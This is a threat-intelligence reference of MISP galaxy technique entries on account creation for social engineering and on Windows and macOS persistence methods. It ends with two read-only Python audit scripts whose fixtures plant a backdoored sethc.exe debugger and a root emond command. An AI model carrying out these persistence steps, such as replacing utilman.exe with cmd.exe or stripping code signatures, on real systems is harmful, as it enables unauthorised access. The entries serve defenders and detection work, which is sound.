For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>

Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or Phishing.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:technique="Establish Accounts"

Accessibility Features

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. <sup>[[FireEye Hikit Rootkit](https://app.tidalcyber.com/references/65d751cb-fdd2-4a45-81db-8a5a11bbee62)]</sup>

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). <sup>[[DEFCON2016 Sticky Keys](https://app.tidalcyber.com/references/f903146d-b63d-4771-8d53-28ef137c9349)]</sup> The [Image File Execution Options Injection](https://app.tidalcyber.com/technique/91d813d3-c17c-4c4c-b86e-0667f669a2f4) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later, as well as Windows Server 2003/R2 and later, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) will cause the replaced file to be executed with SYSTEM privileges. <sup>[[Tilbury 2014](https://app.tidalcyber.com/references/136325ee-0712-49dd-b3ab-a6f2bfb218b0)]</sup>

Other accessibility features exist that may also be leveraged in a similar fashion: <sup>[[DEFCON2016 Sticky Keys](https://app.tidalcyber.com/references/f903146d-b63d-4771-8d53-28ef137c9349)]</sup><sup>[[Narrator Accessibility Abuse](https://app.tidalcyber.com/references/fc889ba3-79a5-445a-81ea-dfe81c1cc542)]</sup>

  • On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>

  • Magnifier: <code>C:\Windows\System32\Magnify.exe</code>

  • Narrator: <code>C:\Windows\System32\Narrator.exe</code>

  • Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>

  • App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

The tag is: misp-galaxy:technique="Accessibility Features"

AppCert DLLs

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Similar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.

The tag is: misp-galaxy:technique="AppCert DLLs"

AppInit DLLs

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. <sup>[[AppInit Registry](https://app.tidalcyber.com/references/dd3f98d9-0228-45a6-9e7b-1babf911a9ac)]</sup> Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. <sup>[[AppInit Secure Boot](https://app.tidalcyber.com/references/2b951be3-5105-4665-972f-7809c057fd3f)]</sup>

The tag is: misp-galaxy:technique="AppInit DLLs"

Application Shimming

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

  • <code>%WINDIR%\AppPatch\sysmain.sdb</code> and

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>

Custom databases are stored in:

  • <code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code> and

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel, and administrator privileges are required to install a shim. However, certain shims can be used to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structured Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).

Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. <sup>[[FireEye Application Shimming](https://app.tidalcyber.com/references/658c8dd6-1a6a-40f0-a7b5-286fd4b1985d)]</sup> Shims can also be abused to establish persistence by continuously being invoked by affected programs.

The tag is: misp-galaxy:technique="Application Shimming"

Change Default File Association

Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.<sup>[[Microsoft Change Default Programs](https://app.tidalcyber.com/references/de515277-a280-40e5-ba34-3e8f16a5c703)]</sup><sup>[[Microsoft File Handlers](https://app.tidalcyber.com/references/cc12cd2c-4f41-4d7b-902d-53c35eb41210)]</sup><sup>[[Microsoft Assoc Oct 2017](https://app.tidalcyber.com/references/63fb65d7-6423-42de-b868-37fbc2bc133d)]</sup> Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example:

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.<sup>[[TrendMicro TROJ-FAKEAV OCT 2012](https://app.tidalcyber.com/references/5d9e974f-07f8-48e4-96b6-632ecb31465d)]</sup>

The tag is: misp-galaxy:technique="Change Default File Association"

Component Object Model Hijacking

Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.<sup>[[Microsoft Component Object Model](https://app.tidalcyber.com/references/e1bb3872-7748-4e64-818f-6187a20d59f0)]</sup> References to various COM objects are stored in the Registry.

Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary’s code will be executed instead.<sup>[[GDATA COM Hijacking](https://app.tidalcyber.com/references/98e88505-b916-430d-aef6-616ba7ddd88e)]</sup> An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

The tag is: misp-galaxy:technique="Component Object Model Hijacking"

Emond

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place.

The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) configuration file at <code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.<sup>[[xorrior emond Jan 2018](https://app.tidalcyber.com/references/b49649ec-28f0-4d30-ab6c-13b12fca36e8)]</sup><sup>[[magnusviri emond Apr 2016](https://app.tidalcyber.com/references/373f64a5-a30f-4b6e-b352-d0c6f8b65fdb)]</sup><sup>[[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]</sup>

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.<sup>[[xorrior emond Jan 2018](https://app.tidalcyber.com/references/b49649ec-28f0-4d30-ab6c-13b12fca36e8)]</sup><sup>[[magnusviri emond Apr 2016](https://app.tidalcyber.com/references/373f64a5-a30f-4b6e-b352-d0c6f8b65fdb)]</sup><sup>[[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]</sup> Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) service.

The tag is: misp-galaxy:technique="Emond"
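The plist rule format described above lends itself to a read-only audit. The following Python is an added example, not part of the MISP galaxy or of Tidal Cyber's text: it walks a rules directory, reports every enabled rule whose action type is RunCommand (what runs, as which user, on which events), and checks whether the QueueDirectories path is populated. The rule and action keys (name, enabled, eventTypes, actions, type, command, user, arguments) are assumed from emond's SampleRules.plist, and the fixture it builds in a temporary directory is constructed.

```python
"""Audit emond rule files for RunCommand actions. Rule/action keys are assumed
from emond's SampleRules.plist; paths are parameters so the check can run
against a copied rules directory or the constructed fixture below."""
import os
import plistlib
import tempfile
from typing import Dict, List

RULES_DIR = "/etc/emond.d/rules"              # rule location named on the page
CLIENTS_DIR = "/private/var/db/emondClients"  # QueueDirectories path named on the page


def load_rules(rules_dir: str) -> List[Dict]:
    """Every .plist in the rules directory holds an array of rule dictionaries."""
    rules: List[Dict] = []
    for name in sorted(os.listdir(rules_dir)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(rules_dir, name), "rb") as fh:
            for rule in plistlib.load(fh):
                rule = dict(rule)
                rule["_file"] = name
                rules.append(rule)
    return rules


def find_command_rules(rules_dir: str) -> List[Dict[str, str]]:
    """One record per RunCommand action in an enabled rule: what runs, as whom, on which events."""
    hits: List[Dict[str, str]] = []
    for rule in load_rules(rules_dir):
        if not rule.get("enabled", False):
            continue
        for action in rule.get("actions", []):
            if action.get("type") != "RunCommand":
                continue
            argv = [action.get("command", "")] + list(action.get("arguments", []))
            hits.append({
                "file": rule["_file"],
                "rule": rule.get("name", "(unnamed)"),
                "events": ",".join(rule.get("eventTypes", [])),
                "user": action.get("user", ""),
                "command": " ".join(argv),
            })
    return hits


def emond_is_armed(clients_dir: str) -> bool:
    """The daemon only launches once something sits in its QueueDirectories path."""
    return os.path.isdir(clients_dir) and bool(os.listdir(clients_dir))


def build_demo(root: str) -> None:
    """Constructed fixture: a disabled sample-style rule beside an enabled startup
    rule that runs a shell command as root, plus a populated clients directory."""
    rules_dir = os.path.join(root, "rules")
    clients_dir = os.path.join(root, "emondClients")
    os.makedirs(rules_dir)
    os.makedirs(clients_dir)
    sample = [{"name": "sample rule", "enabled": False, "eventTypes": ["startup"],
               "actions": [{"type": "RunCommand", "command": "/bin/echo",
                            "user": "root", "arguments": ["sample"]}]}]
    dropped = [{"name": "update check", "enabled": True, "eventTypes": ["startup"],
                "actions": [{"type": "RunCommand", "command": "/bin/sh", "user": "root",
                             "arguments": ["-c", "/Library/Scripts/.update.sh"]}]}]
    with open(os.path.join(rules_dir, "SampleRules.plist"), "wb") as fh:
        plistlib.dump(sample, fh)
    with open(os.path.join(rules_dir, "com.update.plist"), "wb") as fh:
        plistlib.dump(dropped, fh)
    open(os.path.join(clients_dir, "trigger"), "w").close()


def run_demo() -> Dict[str, object]:
    """Build the fixture in a temp dir and audit it; returns the hits and the armed flag."""
    with tempfile.TemporaryDirectory() as root:
        build_demo(root)
        return {"armed": emond_is_armed(os.path.join(root, "emondClients")),
                "hits": find_command_rules(os.path.join(root, "rules"))}


if __name__ == "__main__":
    result = run_demo()
    print("emond armed:", result["armed"])
    for hit in result["hits"]:
        print(f'{hit["file"]}: rule "{hit["rule"]}" on {hit["events"]} runs as {hit["user"]}: {hit["command"]}')
```

On a real host, call `find_command_rules(RULES_DIR)` and `emond_is_armed(CLIENTS_DIR)` instead of the fixture.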

Image File Execution Options Injection

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). <sup>[[Microsoft Dev Blog IFEO Mar 2010](https://app.tidalcyber.com/references/4c62c2cb-bee2-4fc0-aa81-65d66e71a5c2)]</sup>

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. <sup>[[Microsoft GFlags Mar 2017](https://app.tidalcyber.com/references/9c11c382-b420-4cf9-9db2-eaa7b60aee2d)]</sup> IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. <sup>[[Microsoft Dev Blog IFEO Mar 2010](https://app.tidalcyber.com/references/4c62c2cb-bee2-4fc0-aa81-65d66e71a5c2)]</sup>

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). <sup>[[Microsoft Silent Process Exit NOV 2017](https://app.tidalcyber.com/references/86896031-f654-4185-ba45-8c931903153b)]</sup> <sup>[[Oddvar Moe IFEO APR 2018](https://app.tidalcyber.com/references/8661b51c-ddb7-484f-919d-22079c39d1e4)]</sup> Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>. <sup>[[Microsoft Silent Process Exit NOV 2017](https://app.tidalcyber.com/references/86896031-f654-4185-ba45-8c931903153b)]</sup> <sup>[[Oddvar Moe IFEO APR 2018](https://app.tidalcyber.com/references/8661b51c-ddb7-484f-919d-22079c39d1e4)]</sup>

Similar to [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) will cause the "debugger" program to be executed with SYSTEM privileges. <sup>[[Tilbury 2014](https://app.tidalcyber.com/references/136325ee-0712-49dd-b3ab-a6f2bfb218b0)]</sup>

Similar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup> Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) by registering invalid debuggers that redirect and effectively disable various system and security applications. <sup>[[FSecure Hupigon](https://app.tidalcyber.com/references/08ceb57f-065e-45e9-98e9-d58a92caa755)]</sup> <sup>[[Symantec Ushedix June 2008](https://app.tidalcyber.com/references/9df2b407-df20-403b-ba1b-a681b9c74c7e)]</sup>

The tag is: misp-galaxy:technique="Image File Execution Options Injection"

Installer Packages

Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.<sup>[[Installer Package Scripting Rich Trouton](https://app.tidalcyber.com/references/7a877b67-ac4b-4d82-860a-75b5f0b8daae)]</sup>

Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS postinstall scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)) with the elevated permissions.<sup>[[Application Bundle Manipulation Brandon Dalton](https://app.tidalcyber.com/references/2a8fd573-6ab0-403b-b813-88d9d3edab36)]</sup><sup>[[wardle evilquest parti](https://app.tidalcyber.com/references/1ebd91db-9b56-442f-bb61-9e154b5966ac)]</sup>

Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include preinst, postinst, prerm, postrm scripts and run as root when executed.

For Windows, the Microsoft Installer service uses .msi files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged Prebuild and Postbuild events to run commands before or after a build when installing .msi files.<sup>[[Windows AppleJeus GReAT](https://app.tidalcyber.com/references/336ea5f5-d8cc-4af5-9aa0-203e319b3c28)]</sup><sup>[[Debian Manual Maintainer Scripts](https://app.tidalcyber.com/references/e32e293a-f583-494e-9eb5-c82167f2e000)]</sup>

The tag is: misp-galaxy:technique="Installer Packages"

LC_LOAD_DYLIB Addition

Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.<sup>[[Writing Bad Malware for OSX](https://app.tidalcyber.com/references/5628ecd9-48da-4a50-94ba-4b70abe56089)]</sup> There are tools available to perform these changes.

Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.<sup>[[Malware Persistence on OS X](https://app.tidalcyber.com/references/d4e3b066-c439-4284-ba28-3b8bd8ec270e)]</sup>

The tag is: misp-galaxy:technique="LC_LOAD_DYLIB Addition"

Netsh Helper DLL

Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.<sup>[[TechNet Netsh](https://app.tidalcyber.com/references/58112a3a-06bd-4a46-8a09-4dba5f42a04f)]</sup> The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.

Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.<sup>[[Github Netsh Helper CS Beacon](https://app.tidalcyber.com/references/c3169722-9c32-4a38-a7fe-8d4b6e51ca36)]</sup><sup>[[Demaske Netsh Persistence](https://app.tidalcyber.com/references/663b3fd6-0dd6-45c8-afba-dc0ea6d331b5)]</sup>

The tag is: misp-galaxy:technique="Netsh Helper DLL"

PowerShell Profile

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) starts and can be used as a logon script to customize user environments.

[PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. <sup>[[Microsoft About Profiles](https://app.tidalcyber.com/references/1da63665-7a96-4bc3-9606-a3575b913819)]</sup>

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) drives to gain persistence. Every time a user opens a [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. <sup>[[ESET Turla PowerShell May 2019](https://app.tidalcyber.com/references/68c0f34b-691a-4847-8d49-f18b7f4e5188)]</sup>

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. <sup>[[Wits End and Shady PowerShell Profiles](https://app.tidalcyber.com/references/8fcbd99a-1fb8-4ca3-9efd-a98734d4397d)]</sup>

The tag is: misp-galaxy:technique="PowerShell Profile"

Screensaver

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.<sup>[[Wikipedia Screensaver](https://app.tidalcyber.com/references/b5d69465-27df-4acc-b6cc-f51be8780b7b)]</sup> The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:

  • <code>SCRNSAVE.exe</code> - set to malicious PE path

  • <code>ScreenSaveActive</code> - set to '1' to enable the screensaver

  • <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock

  • <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.<sup>[[ESET Gazer Aug 2017](https://app.tidalcyber.com/references/9d1c40af-d4bc-4d4a-b667-a17378942685)]</sup>

The tag is: misp-galaxy:technique="Screensaver"
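Several of the techniques above (Accessibility Features, Image File Execution Options Injection, AppCert DLLs, AppInit DLLs, Netsh Helper DLL and Screensaver) come down to a handful of Registry locations, so a single read-only audit of an exported hive covers them. The following Python is an added example, not part of the MISP galaxy or of Tidal Cyber's text: it parses `reg export` text for those keys and reports what it finds. The sample export is constructed; the "explicit path means foreign helper" rule for Netsh is an assumed heuristic, and `ScreenSaverIsSecure` is included because the page names it.

```python
"""Audit a Windows Registry export (.reg text) for the persistence locations
described above. Read-only: it parses an exported file, never a live hive."""
import re

# Accessibility binaries named on the page; a "debugger" on one of them runs as SYSTEM from the logon screen.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                          "narrator.exe", "displayswitch.exe", "atbroker.exe"}
NT_CV = r"hkey_local_machine\software\microsoft\windows nt\currentversion"
IFEO = NT_CV + r"\image file execution options"
SILENT_EXIT = NT_CV + r"\silentprocessexit"
APPCERT = r"hkey_local_machine\system\currentcontrolset\control\session manager\appcertdlls"
APPINIT_KEYS = {NT_CV + r"\windows",
                r"hkey_local_machine\software\wow6432node\microsoft\windows nt\currentversion\windows"}
NETSH = r"hkey_local_machine\software\microsoft\netsh"
SCREENSAVER = r"hkey_current_user\control panel\desktop"
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')

def normalize_key(path):
    """Lower-case and expand the HKLM/HKCU abbreviations so lookups are uniform."""
    p = path.strip().lower().rstrip("\\")
    for short, full in (("hklm\\", "hkey_local_machine\\"), ("hkcu\\", "hkey_current_user\\")):
        if p.startswith(short):
            p = full + p[len(short):]
    return p

def parse_reg(text):
    """{normalized key: {lower-cased value name: data}}; REG_SZ is unescaped, dword:/hex: kept raw."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = normalize_key(m.group(1))
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name = "(default)" if m.group(1) is None else m.group(1).replace('\\"', '"').lower()
            data = m.group(2)
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            keys[current][name] = data
    return keys

def audit(keys):
    """Return (category, detail) findings for the locations discussed on the page."""
    findings = []
    for path, values in keys.items():
        parent, _, leaf = path.rpartition("\\")
        if parent == IFEO and "debugger" in values:
            kind = "accessibility binary" if leaf in ACCESSIBILITY_BINARIES else "other binary"
            findings.append(("IFEO debugger", f"{leaf} -> {values['debugger']} ({kind})"))
        elif parent == SILENT_EXIT and values:
            findings.append(("SilentProcessExit monitor", f"{leaf}: {sorted(values.items())}"))
        elif path == APPCERT:
            for name, data in values.items():
                findings.append(("AppCert DLL", f"{name} -> {data}"))
        elif path in APPINIT_KEYS and values.get("appinit_dlls"):
            findings.append(("AppInit DLL", values["appinit_dlls"]))
        elif path == NETSH:
            # Heuristic: built-in helpers are registered by bare DLL name; an explicit path stands out.
            for name, data in values.items():
                if "\\" in data:
                    findings.append(("Netsh helper DLL", f"{name} -> {data}"))
        elif path == SCREENSAVER:
            exe = values.get("scrnsave.exe", "")
            if exe and not exe.lower().startswith(SYSTEM_DIRS):
                findings.append(("Screensaver outside Windows dirs",
                                 f"{exe} (ScreenSaverIsSecure={values.get('screensaverissecure', 'unset')})"))
    return findings

# Constructed export for demonstration; entries mirror the page's own descriptions
# (cmd.exe as "debugger" for sethc.exe, ntsd as a genuine debugger for notepad.exe).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\dbg\\ntsd.exe -g"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"helper"="C:\\ProgramData\\helper.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Netsh]
"ifmon"="ifmon.dll"
"custom"="C:\\Users\\Public\\nethelper.dll"
[HKEY_CURRENT_USER\Control Panel\Desktop]
"SCRNSAVE.EXE"="C:\\Users\\Public\\saver.scr"
"ScreenSaverIsSecure"="0"
'''

if __name__ == "__main__":
    for category, detail in audit(parse_reg(SAMPLE_REG)):
        print(f"[{category}] {detail}")
```

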